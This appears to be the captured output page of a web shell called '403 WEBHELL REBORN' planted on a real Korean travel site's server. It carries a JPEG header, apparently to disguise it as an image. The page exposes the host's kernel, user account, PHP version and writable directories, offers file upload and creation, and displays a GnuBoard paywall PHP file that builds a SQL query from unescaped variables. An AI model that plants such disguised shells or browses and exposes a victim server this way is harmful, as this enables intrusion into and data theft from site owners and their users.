ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/board/ziplinekorea_service/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/board/ziplinekorea_service/view.head.skin.php
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가 
include_once("$g4[path]/contents.config.php");

define('_PAY_', true);

if($board[bo_pay]) {
    if (!$is_member) {
        alert("로그인 해 주십시오.\\n\\n회원이 아니신 경우 회원가입 하시기 바랍니다.", "$g4[path]/bbs/login.php?url=".urlencode($_SERVER[PHP_SELF]."?bo_table=$bo_table&wr_id=$wr_id"));
    }

    // 절대 수정, 삭제하지 마세요.
    echo "<script>_pay_skin=true;</script>";

    $sql = " select mp_last_date from $g4[cont4_member_period] where mb_id = '$member[mb_id]' ";
    $row = sql_fetch($sql);
    if (!$row) {
        alert("기간충전 내역이 없습니다.\\n\\n기간은 보유하신 포인트로 충전 할 수 있습니다.", "$g4[cont_path]/period.php");
        //echo "<script language=javascript>alert('기간충전 내역이 없습니다.\\n\\n기간은 보유하신 포인트로 충전 할 수 있습니다.'); location.href='$g4[cont_path]/period.php';</script>";
        // exit; // exit 쓰면 안됨
    } else {
        if ($g4['time_ymd'] > $row[mp_last_date]) {
            //echo "<script language=javascript>alert('충전하신 기간이 만료 되었습니다.\\n\\n충전기간 : $row[mp_last_date] 까지\\n\\n게시물을 확인하시려면 보유하신 포인트로 기간을 충전하시기 바랍니다.'); location.href='$g4[cont_path]/period.php';</script>";
            die("<script language=javascript>alert('충전하신 기간이 만료 되었습니다.\\n\\n충전기간 : $row[mp_last_date] 까지\\n\\n게시물을 확인하시려면 보유하신 포인트로 기간을 충전하시기 바랍니다.'); location.href='$g4[cont_path]/period.php';</script>");
            // exit; // exit 쓰면 안됨
        }
    }
}
?>

Anon7 - 2021